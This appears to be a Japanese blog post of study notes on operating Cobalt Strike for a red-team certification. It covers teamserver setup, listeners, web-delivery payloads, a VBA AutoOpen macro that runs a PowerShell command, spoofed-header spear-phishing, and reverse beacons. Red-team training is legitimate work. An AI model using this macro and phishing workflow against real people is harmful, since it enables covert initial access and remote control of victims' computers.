Cobalt Strikeの使い方

Cobalt Strikeを持ってはいたのですが、使い方がいまいちわかっておらず、CRTOを受験する際に、必要になるので、使い方のメモを残したいと思います。

Adversary Simulation and Red Team Operations Software - Cobalt Strike

Teamserver

まずはteamserverを立ち上げます。

sudo ./teamserver 10.8.0.6 Passw0rd!

IPアドレスは使用するインターフェースのものを使用します。

次にcobaltstrikeファイルを実行します。

./cobaltstrike

Windowsではcobaltstrike.exeを起動します。

ログイン画面でteamserverを立ち上げる時に使用したパスワードを使用してログインします。ユーザはなんでもいいです。

f:id:Yunolay:20210206150035p:plain

Listener

Cobalt Strike > Listenersを押してAddして新しくListenerを立ち上げます。

f:id:Yunolay:20210206154237p:plain

Payloads

Macro

Attacks > Scripted Web Delivery (S).を選択します。

f:id:Yunolay:20210206164327p:plain

Payloadをコピーします。Attacks > Web Drive-by > Manageからいつでもコピーできます。

f:id:Yunolay:20210206160644p:plain

View > Web LogでHTTPリクエストが到着したことを確認します。

Sub DoStuff()
    Dim wsh As Object
    Set wsh = CreateObject("WScript.Shell")
    wsh.Run "<powershell command here>"
    Set wsh = Nothing
End Sub

Sub AutoOpen()
    DoStuff
End Sub

Host File

Attacks > Web Drive-by > Host Fileから作成します。

Attacks > Packages > HTML Application / MS Office Macro経由でペイロードを作成することもできます。

f:id:Yunolay:20210206171225p:plain

f:id:Yunolay:20210206171253p:plain

CobaltStrikeで作成したマクロを貼り付けます。

f:id:Yunolay:20210206171620p:plain

Mail

Spear phish

Templateを使用することによってメールのヘッダ等を書き換えてフィッシングメールを送ることが出来ます。

TemplateはGmailから詳細を開いてShow originalを開いて取得します。

f:id:Yunolay:20210207143606p:plain

Beacon

ファイルを開いた際にマクロが動いてリバースビーコンが動きます

f:id:Yunolay:20210207002839p:plain